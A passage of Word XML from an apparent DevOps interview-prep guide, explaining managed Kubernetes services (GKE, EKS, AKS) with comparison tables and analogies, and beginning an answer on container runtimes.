        <w:t>A: GKE (Google Kubernetes Engine) is a managed Kubernetes service provided by Google Cloud that lets you run and operate clusters in Kubernetes without manually managing the control plane or infrastructure.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>GKE is Kubernetes, but fully managed by Google Cloud—you focus on deploying apps, not managing the cluster itself.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why GKE is used</w:t>
        <w:br/>
        <w:t>It removes the operational burden of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Setting up Kubernetes control plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Managing upgrades</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Maintaining etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Handling scaling of master nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensuring high availability of cluster components</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What GKE manages for you</w:t>
        <w:br/>
        <w:t>1. Control plane (fully managed)</w:t>
        <w:br/>
        <w:t>Google handles:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kube-apiserver</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kube-scheduler</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kube-controller-manager</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Upgrades</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automated Kubernetes version upgrades</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Patch management</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Rolling updates of cluster components</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. High availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Multi-zone / regional clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automatic failover of control plane</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Security</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * IAM integration</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Workload Identity</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Network policies</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Private clusters support</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What you manage in GKE</w:t>
        <w:br/>
        <w:t>You still manage:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Worker nodes (or node pools)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Application deployments</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pod configurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Services and networking (partially)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>GKE architecture</w:t>
        <w:br/>
        <w:t>Google Managed Control Plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ├── API Server</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ├── Scheduler</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ├── Controller Manager</w:t>
        <w:br/>
        <w:t xml:space="preserve">   └── etcd</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Customer Managed Nodes (Node Pools)</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ├── kubelet</w:t>
        <w:br/>
        <w:t xml:space="preserve">   ├── kube-proxy</w:t>
        <w:br/>
        <w:t xml:space="preserve">   └── Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Types of GKE clusters</w:t>
        <w:br/>
        <w:t>1. Standard GKE</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * You manage node configuration</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * More control and flexibility</w:t>
        <w:br/>
        <w:t>2. Autopilot GKE</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Fully managed nodes + control plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Google handles scaling, provisioning, optimization</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pay-per-pod model</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features</w:t>
        <w:br/>
        <w:t>1. Autoscaling</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cluster Autoscaler</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Horizontal Pod Autoscaler (HPA)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Vertical Pod Autoscaler (VPA)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Networking</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * VPC-native clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Load balancing integration</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cloud NAT and ingress support</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cloud Monitoring</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cloud Logging</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Managed Prometheus</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Security</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Workload Identity (IAM-based auth)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Private clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Binary Authorization</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>GKE vs self-managed Kubernetes (kubeadm)</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>GKE</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubeadm</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Control plane</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Managed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Self-managed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Setup effort</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Very low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Upgrades</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Automatic</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manual</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Scaling</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Built-in</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manual</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Maintenance</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Google handles</w:t>
        <w:br/>
        <w:tab/>
        <w:t>User handles</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kubeadm Kubernetes = building your own house</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * GKE = living in a fully serviced apartment where maintenance, security, and utilities are handled for you</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Production microservices at scale</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cloud-native applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * AI/ML workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enterprise applications needing high availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Fast deployment without infrastructure overhead</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Vendor lock-in (Google Cloud)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Less control over control plane internals</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Costs can be higher than self-managed setups</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>GKE (Google Kubernetes Engine) is a fully managed Kubernetes service provided by Google Cloud that automates the deployment, scaling, and management of Kubernetes clusters by handling the control plane, upgrades, and infrastructure, allowing users to focus on application deployment and workload management.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q311. What is EKS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: EKS (Elastic Kubernetes Service) is a fully managed Kubernetes service provided by AWS that lets you run and manage clusters in Kubernetes without managing the control plane yourself.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>EKS is AWS’s managed Kubernetes platform where AWS handles the Kubernetes control plane, and you manage worker nodes and applications.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why EKS is used</w:t>
        <w:br/>
        <w:t>It simplifies Kubernetes operations by removing the need to:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Install and manage control plane components</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Maintain etcd cluster</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Handle API server availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Manage master node scaling and upgrades</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What AWS manages in EKS</w:t>
        <w:br/>
        <w:t>1. Control plane (fully managed)</w:t>
        <w:br/>
        <w:t>AWS manages:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kube-apiserver</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kube-scheduler</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kube-controller-manager</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * High availability across multiple AZs</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automatic patching and upgrades</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Security</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Integrated with IAM for authentication</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Encrypted etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Secure API access</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What you manage in EKS</w:t>
        <w:br/>
        <w:t>You manage:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Worker nodes (EC2 instances or Fargate)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Node groups</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pods, Deployments, Services</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Networking (partially via VPC)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>EKS architecture</w:t>
        <w:br/>
        <w:t>AWS Managed Control Plane</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── API Server</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── Scheduler</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── Controller Manager</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Worker Nodes (Customer Managed)</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── kubelet</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── kube-proxy</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Compute options in EKS</w:t>
        <w:br/>
        <w:t>1. EC2 Worker Nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Traditional VM-based nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Full control over instances</w:t>
        <w:br/>
        <w:t>2. Managed Node Groups</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * AWS manages node lifecycle (scaling, upgrades)</w:t>
        <w:br/>
        <w:t>3. AWS Fargate</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Serverless compute for Pods</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * No node management required</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features</w:t>
        <w:br/>
        <w:t>1. High availability</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Control plane spans multiple Availability Zones</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automatic failover</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Autoscaling</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cluster Autoscaler</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Horizontal Pod Autoscaler (HPA)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Karpenter (modern node provisioning tool)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Networking</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * VPC-native networking</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * AWS CNI plugin</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Load Balancers (ALB/NLB integration)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Security</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * IAM-based authentication</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * IRSA (IAM Roles for Service Accounts)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Private clusters</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Security Groups integration</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>EKS vs kubeadm vs GKE</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>EKS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>GKE</w:t>
        <w:br/>
        <w:tab/>
        <w:t>kubeadm</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Control plane</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Managed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Managed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Self-managed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Setup effort</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Very low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>High</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Cloud dependency</w:t>
        <w:br/>
        <w:tab/>
        <w:t>AWS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Google Cloud</w:t>
        <w:br/>
        <w:tab/>
        <w:t>None</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Node management</w:t>
        <w:br/>
        <w:tab/>
        <w:t>User / managed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>User / autopilot</w:t>
        <w:br/>
        <w:tab/>
        <w:t>User</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Upgrades</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Managed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Automated</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Manual</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kubeadm = building your own house</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * EKS = renting a fully maintained apartment in AWS ecosystem</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * GKE = same idea but in Google Cloud</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enterprise-grade microservices</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * AWS-native applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Hybrid cloud setups</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Scalable container workloads</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Production systems requiring high availability</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * AWS vendor lock-in</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cost of managed control plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Some networking complexity (VPC/CNI setup)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Less control over control plane internals</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>EKS (Elastic Kubernetes Service) is a managed Kubernetes service from AWS that automates the provisioning and management of the Kubernetes control plane while allowing users to run workloads on EC2 or Fargate-based worker nodes, providing scalability, high availability, and integration with AWS services like IAM and VPC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q312. Explain AKS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: AKS (Azure Kubernetes Service) is a managed Kubernetes service provided by Microsoft Azure that simplifies deploying, managing, and scaling applications running in Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>AKS lets you run Kubernetes on Azure without managing the control plane—Azure handles the cluster management, while you focus on applications.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why AKS is used</w:t>
        <w:br/>
        <w:t>It removes the operational overhead of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Setting up Kubernetes control plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Maintaining etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Managing master nodes</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Handling upgrades and patches</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ensuring control plane high availability</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What Azure manages in AKS</w:t>
        <w:br/>
        <w:t>1. Control plane (fully managed)</w:t>
        <w:br/>
        <w:t>Azure manages:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kube-apiserver</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kube-scheduler</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kube-controller-manager</w:t>
        <w:br/>
        <w:t>✔ Highly available and automatically patched</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Security and updates</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Automatic Kubernetes upgrades</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Security patching</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Integrated monitoring and logging</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>What you manage in AKS</w:t>
        <w:br/>
        <w:t>You manage:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Node pools (VM Scale Sets)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Pods, Deployments, Services</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Application configurations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Networking rules (partially via Azure VNet)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>AKS architecture</w:t>
        <w:br/>
        <w:t>Azure Managed Control Plane</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── API Server</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── etcd</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── Scheduler</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── Controller Manager</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Customer Node Pools (VMs)</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── kubelet</w:t>
        <w:br/>
        <w:t xml:space="preserve"> ├── kube-proxy</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └── Pods</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Compute options in AKS</w:t>
        <w:br/>
        <w:t>1. VM Scale Sets (default)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Managed group of VMs</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Supports autoscaling</w:t>
        <w:br/>
        <w:t>2. Azure Container Instances (ACI)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Serverless Pods (burst workloads)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Key features of AKS</w:t>
        <w:br/>
        <w:t>1. Autoscaling</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cluster Autoscaler (node scaling)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Horizontal Pod Autoscaler (Pod scaling)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Vertical Pod Autoscaler (resource tuning)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>2. Networking</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Azure VNet integration (native networking)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Azure CNI / Kubenet</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Load Balancer integration</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Ingress Controller support (NGINX, AGIC)</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>3. Security</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Azure Active Directory (AAD) integration</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Role-Based Access Control (RBAC)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Managed identities</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Private clusters</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>4. Observability</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Azure Monitor for containers</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Log Analytics</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Prometheus integration</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>AKS vs EKS vs GKE</w:t>
        <w:br/>
        <w:t>Feature</w:t>
        <w:br/>
        <w:tab/>
        <w:t>AKS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>EKS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>GKE</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Provider</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Azure</w:t>
        <w:br/>
        <w:tab/>
        <w:t>AWS</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Google Cloud</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Control plane</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Managed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Managed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Managed</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Setup complexity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Very low</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Networking</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Azure VNet</w:t>
        <w:br/>
        <w:tab/>
        <w:t>AWS VPC</w:t>
        <w:br/>
        <w:tab/>
        <w:t>GCP VPC</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Identity</w:t>
        <w:br/>
        <w:tab/>
        <w:t>Azure AD</w:t>
        <w:br/>
        <w:tab/>
        <w:t>IAM</w:t>
        <w:br/>
        <w:tab/>
        <w:t>IAM</w:t>
        <w:br/>
        <w:tab/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Simple analogy</w:t>
        <w:br/>
        <w:t>Think of:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * kubeadm = building your own house</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * AKS = living in a fully managed apartment in Microsoft Azure ecosystem where plumbing, electricity, and security are handled for you</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Use cases</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Enterprise Azure-based applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Microservices architectures</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Hybrid cloud deployments (Azure Arc)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Scalable web applications</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * CI/CD-driven container workloads</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitations</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Azure vendor lock-in</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Less control over control plane</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Networking can be complex (VNet design)</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Cost of managed services</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Interview-ready definition</w:t>
        <w:br/>
        <w:t>AKS (Azure Kubernetes Service) is a managed Kubernetes service provided by Microsoft Azure that automates the deployment, scaling, and maintenance of Kubernetes clusters by managing the control plane, while allowing users to run workloads on Azure-managed node pools integrated with Azure services like VNet, AAD, and monitoring tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q313. What is container runtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A container runtime is the software responsible for running containers on a host machine in systems like Kubernetes.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Core idea</w:t>
        <w:br/>
        <w:t>A container runtime is the engine that pulls container images, creates containers, and manages their lifecycle (start, stop, delete).</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Why it is needed</w:t>
        <w:br/>
        <w:t>Containers are just images until a runtime:</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Downloads the image</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Creates isolated environment</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Allocates CPU, memory, network</w:t>
        <w:br/>
        <w:t xml:space="preserve">         * Starts the application process</w:t>
        <w:br/>
        <w:t>Without a runtime → containers cannot execute.</w:t>
        <w:br/>
        <w:t>________________</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Where it fits in Kubernetes</w:t>
        <w:br/>
        <w:t>Kubernetes nodes use a runtime to run Pods:</w:t>
        <w:br/>
        <w:t>Kubernetes → kubelet → Container Runtime → Containers</w:t>
        <w:br/>
        <w:t>The kubelet tells the runtime what to run.</w:t>
        <w:br/>
        <w:t>________________</w:t>
